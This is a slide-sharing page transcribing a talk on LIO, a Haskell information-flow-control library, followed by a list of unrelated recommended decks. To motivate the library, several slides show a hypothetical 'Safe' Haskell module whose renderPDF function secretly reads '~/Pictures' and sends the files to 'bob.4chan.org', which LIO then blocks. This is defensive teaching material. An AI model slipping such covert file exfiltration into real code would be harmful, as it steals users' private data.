building secure systems with lio
play

Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro - PowerPoint PPT Presentation

Jan 18, 2024 •443 likes •690 views

Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro Russo and David Mazires Building systems is hard. if ((err = SSLHashSHA1.upda goto fail; if ((err = SSLHashSHA1.upda goto fail; goto fail; if ((err = SSLHashSHA1.fina

  1. Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro Russo and David Mazières

  2. Building systems is hard.

  3. � if ((err = SSLHashSHA1.upda goto fail; if ((err = SSLHashSHA1.upda goto fail; goto fail; if ((err = SSLHashSHA1.fina goto fail; Building secure systems is harder.

  4. Safe Haskell to the rescue!

  5. Kind of…

  6. cabal install your-cool-lib

  7. {-# LANGUAGE Safe #-} module YourCoolLib where � ... � renderPDF :: Text -> IO PDF renderPDF txt = do pics <- readFiles “~/Pictures” ... sendFiles pics “bob.4chan.org” _renderPDF txt

  8. {-# LANGUAGE Safe #-} module YourCoolLib where � ... � renderPDF :: Text -> IO PDF renderPDF txt = do pics <- readFiles “~/Pictures” sendFiles pics “bob.4chan.org” _renderPDF txt

  9. But, I don’t execute untrusted code!

  10. You do: 83% of CVEs are in application code

  11. Should treat most of your code as untrusted ➠ address one problem!

  12. Safely executing untrusted code • Approach: information control flow (IFC) ➤ Associate security policy with data ➤ Enforce that all code abides by data policy • Result: data confidentiality and integrity

  13. Policy specification with DCLabels (demo)

  14. {-# LANGUAGE Safe #-} module YourCoolLib where � ... � renderPDF :: Text -> LIO PDF renderPDF txt = do pics <- readFiles “~/Pictures” sendFiles pics “bob.4chan.org” _renderPDF txt

  15. {-# LANGUAGE Safe #-} module YourCoolLib where � ... � renderPDF :: Text -> LIO PDF renderPDF txt = do alice canFlowTo bob.4chan.org? pics <- readFiles “~/Pictures” ✗ sendFiles pics “bob.4chan.org” _renderPDF txt

  16. Enforcement with simplified LIO (demo)

  17. But real apps require some form of information release…

  18. {-# LANGUAGE Safe #-} module ICloudLib where � ... � backup :: DCPriv -> LIO () backup alicePriv = do pics <- readFiles “~/Pictures” sendFilesP alicePriv pics “upload.icloud.com”

  19. Other LIO features • LIORefs, LChans, LMVars, etc. • Threads • Exceptions • File system • Database system • HTTP server & client

  20. Other LIO features • LIORefs, LChans, LMVars, etc. • Threads • Exceptions • File system • Database system • HTTP server & client …port your own!

  21. Challenge: policy specification • LIO ensures that code cannot violate IFC • DCLabels is a simple label model • But to ensure security, still must: ➤ Set the correct policy ➤ Structure app code to minimize use of privileges

  22. Challenge: policy specification • LIO ensures that code cannot violate IFC • DCLabels is a simple label model • But to ensure security, still must: ➤ Set the correct policy ➤ Structure app code to minimize use of privileges … this is hard, but we have some ideas!

  23. 
 www.labeled.io We built multiple systems… 
 LearnByHacking - School of Haskell clone GitStar - GitHub platform clone LambdaChair - Conference review system Blog, wiki, auth server, commenting system, … give it a shot! cabal install lio

Recommend

CSE 291 Building Secure Systems using Programming Languages and Analysis Fall 2016 Tue/Thurs

CSE 291 Building Secure Systems using Programming Languages and Analysis Fall 2016 Tue/Thurs

CSE 291 Building Secure Systems using Programming Languages and Analysis Fall 2016 Tue/Thurs 5:00-6:20PM Deian Stefan UC San Diego Who am I? New assistant professor PhD at Stanford (Mazieres &amp; Mitchell) I like to build secure

896 views • 50 slides
Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Secure Systems

Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Secure Systems

Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Secure Systems Computer systems can be considered a closed box. Informa8on in the box is safe as long as nothing enters or leaves the box. Systems S8ll

206 views • 16 slides
Sandboxing and isolation Deian Stefan Today Lecture objectives: Understand basic principles

Sandboxing and isolation Deian Stefan Today Lecture objectives: Understand basic principles

CSE 127: Computer Security Sandboxing and isolation Deian Stefan Today Lecture objectives: Understand basic principles for building secure systems Understand mechanisms used to build secure systems Principles of secure design

1.1k views • 64 slides
Zero Knowledge Succinct Arguments: an Introduction Alessandro Chiesa UC Berkeley 1 Motivation

Zero Knowledge Succinct Arguments: an Introduction Alessandro Chiesa UC Berkeley 1 Motivation

Zero Knowledge Succinct Arguments: an Introduction Alessandro Chiesa UC Berkeley 1 Motivation 2 3 cryptography is a powerful tool for building secure systems 3 cryptography is a powerful tool for building secure systems much of the

2.47k views • 194 slides
Closed, Sealed &amp; Secure Container Valve Systems Micro Matic - Closed, Sealed &amp; Secure

Closed, Sealed &amp; Secure Container Valve Systems Micro Matic - Closed, Sealed &amp; Secure

Closed, Sealed &amp; Secure Container Valve Systems Micro Matic - Closed, Sealed &amp; Secure Container Valve Systems Delivering DEF Purity, Packaging Integrity &amp; Operational Excellence Overview Points of Discussion How We Can Help You &amp;

598 views • 34 slides
A Model-driven Approach Towards Designing and Analysing Secure Systems for Multi-clouds Shaun

A Model-driven Approach Towards Designing and Analysing Secure Systems for Multi-clouds Shaun

A Model-driven Approach Towards Designing and Analysing Secure Systems for Multi-clouds Shaun Shei Secure and Dependable Software Systems (SenSe) Haralambos Mouratidis Stylianos Kapetanakis Aidan Delaney Overview What is Cloud Computing?

774 views • 56 slides
Secure Communication Secure Communication Lecture 14 Wrap-Up We saw... Symmetric-Key

Secure Communication Secure Communication Lecture 14 Wrap-Up We saw... Symmetric-Key

Secure Communication Secure Communication Lecture 14 Wrap-Up We saw... Symmetric-Key Components SKE, MAC Public-Key Components PKE, Digital Signatures Building blocks: Block-ciphers (AES), Hash-functions (SHA-3), Trapdoor PRG/OWP for PKE

1.07k views • 72 slides
WELCOME! Building a Food Systems Network for Niagara April 20, 2017 People working in

WELCOME! Building a Food Systems Network for Niagara April 20, 2017 People working in

WELCOME! Building a Food Systems Network for Niagara April 20, 2017 People working in Niagaras food continuum developing Shared understanding Common language Description of how a healthy, secure, sustainable food landscape

1.15k views • 69 slides
CEF eI D Building Block European Com m ission DI GI T Frdric POELS STORK Secure idenTity

CEF eI D Building Block European Com m ission DI GI T Frdric POELS STORK Secure idenTity

CEF eI D Building Block European Com m ission DI GI T Frdric POELS STORK Secure idenTity acrOss boRders linKed I SA Interoperability Solutions for European Public Administrations eI DAS STORK 2 .0 Electronic Identification, Secure

793 views • 31 slides
How Secure are Secure How Secure are Secure Interdomain Routing Protocols? Interdomain Routing

How Secure are Secure How Secure are Secure Interdomain Routing Protocols? Interdomain Routing

DIMACS Workshop On Secure Routing March 10, 2010 How Secure are Secure How Secure are Secure Interdomain Routing Protocols? Interdomain Routing Protocols? $ $ Sharon Goldberg Microsoft Research &amp; Boston University y Michael Schapira

702 views • 54 slides
TDDD82 Secure Mobile Systems Lecture 1: Introductjon and Distributed Systems Models Mikael

TDDD82 Secure Mobile Systems Lecture 1: Introductjon and Distributed Systems Models Mikael

TDDD82 Secure Mobile Systems Lecture 1: Introductjon and Distributed Systems Models Mikael Asplund Real-tjme Systems Laboratory Department of Computer and Informatjon Science Linkping University Based on slides by Simin Nadjm-Tehrani

942 views • 42 slides
Introduction to Computer Security Session 2.3 Designing Secure Network Systems Prof. Nadim

Introduction to Computer Security Session 2.3 Designing Secure Network Systems Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 2.3 Designing Secure Network Systems Prof. Nadim Kobeissi Goals of todays class. A look into some secure network systems: WireGuard: a modern VPN. A critical look at ProtonMail,

1.15k views • 71 slides
BUILDING FAIRER AI- BUILDING FAIRER AI- ENABLED SYSTEMS ENABLED SYSTEMS Christian Kaestner

BUILDING FAIRER AI- BUILDING FAIRER AI- ENABLED SYSTEMS ENABLED SYSTEMS Christian Kaestner

BUILDING FAIRER AI- BUILDING FAIRER AI- ENABLED SYSTEMS ENABLED SYSTEMS Christian Kaestner (with slides from Eunsuk Kang) Required reading: Holstein, Kenneth, Jennifer Wortman Vaughan, Hal Daum III, Miro Dudik, and Hanna Wallach. &quot;

1.25k views • 100 slides
Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon State University 1 How does someone know they have been HACKED!? and WHO did it!? HACKED!? and WHO did it!? 2 Audit Logs in the News!

701 views • 51 slides
Motivation: MSA Motivation: MSA Current attacks to distributed systems involve multiple steps

Motivation: MSA Motivation: MSA Current attacks to distributed systems involve multiple steps

Secure Configuration of Intrusion Detection Secure Configuration of Intrusion Detection Sensors for Changing Enterprise Systems Gaspar Modelo-Howard, Jevin Sweval, Saurabh Bagchi Presented by Amiya Kumar Maji Dependable Computing Systems Lab

611 views • 12 slides
Securing Secure Boot on Xen Ross Lagerwall Software Engineer, Citrix Systems 1 / 15

Securing Secure Boot on Xen Ross Lagerwall Software Engineer, Citrix Systems 1 / 15

Securing Secure Boot on Xen Ross Lagerwall Software Engineer, Citrix Systems 1 / 15 Presentation licensed CC-By-SA-4.0 Why Secure Boot? How can we prevent running malware at boot? With Secure Boot! What if the machine is a VM in

303 views • 15 slides
Building Secure Cultures Leigh Honeywell @hypatiadotca about me Canadian ex-Symantec,

Building Secure Cultures Leigh Honeywell @hypatiadotca about me Canadian ex-Symantec,

Building Secure Cultures Leigh Honeywell @hypatiadotca about me Canadian ex-Symantec, Microsoft Rebooted your Windows machines a few times in 2012 Now at Heroku, a Salesforce.com company move fast and break things. until this happens

445 views • 23 slides
Motivation for IDS Developing absolutely secure systems is Intrusion Detection (IDS) not

Motivation for IDS Developing absolutely secure systems is Intrusion Detection (IDS) not

Motivation for IDS Developing absolutely secure systems is Intrusion Detection (IDS) not possible Most existing systems have security flaws Abuses by privileged insiders are possible Simone Fischer-Hbner Not all kinds of

414 views • 4 slides
Designing and Building Secure Software With material from Dave Levin, Mike Hicks, Adam Shostack

Designing and Building Secure Software With material from Dave Levin, Mike Hicks, Adam Shostack

Designing and Building Secure Software With material from Dave Levin, Mike Hicks, Adam Shostack Making secure software Flawed approach : Design and build software, ignore security at first Add security once the functional requirements

858 views • 39 slides
Building Secure Channels Kenny Paterson Information Security Group

Building Secure Channels Kenny Paterson Information Security Group

Building Secure Channels Kenny Paterson Information Security Group Overview Why do we need secure channels? What properties should they have?

480 views • 31 slides
Building Secure Applications Greg Ponto &amp; Tom Shippee Presentation agenda Overview -

Building Secure Applications Greg Ponto &amp; Tom Shippee Presentation agenda Overview -

Esri International User Conference San Diego, California Technical Workshops | July 26, 2012 Building Secure Applications Greg Ponto &amp; Tom Shippee Presentation agenda Overview - Exploring 10.1 architecture Beginners: - Using 10.1

461 views • 28 slides
Collaboration, Interoperability, and Secure Systems Mr. Richard Lee ADUSD (Information

Collaboration, Interoperability, and Secure Systems Mr. Richard Lee ADUSD (Information

Collaboration, Interoperability, and Secure Systems Mr. Richard Lee ADUSD (Information Integration &amp; Operations) ODUSD (Advanced Systems &amp; Concepts Defense Research &amp; Engineering 703-695-7938 Richard.lee@osd.mil May 21, 2008

484 views • 9 slides
Development*Process*for*Secure* So2ware Development Processes ( Lecture outline ) Emphasis on

Development*Process*for*Secure* So2ware Development Processes ( Lecture outline ) Emphasis on

Development*Process*for*Secure* So2ware Development Processes ( Lecture outline ) Emphasis on building secure software as opposed to building security software Major methodologies Microsoft's Security Development Lifecycle

598 views • 34 slides
TDDD82 Secure Mobile Systems Lecture 5: Dependability Mikael Asplund Real-tjme Systems

TDDD82 Secure Mobile Systems Lecture 5: Dependability Mikael Asplund Real-tjme Systems

TDDD82 Secure Mobile Systems Lecture 5: Dependability Mikael Asplund Real-tjme Systems Laboratory Department of Computer and Informatjon Science Linkping University Based on slides by Simin Nadjm-Tehrani Dependability Property of a

697 views • 22 slides

More recommend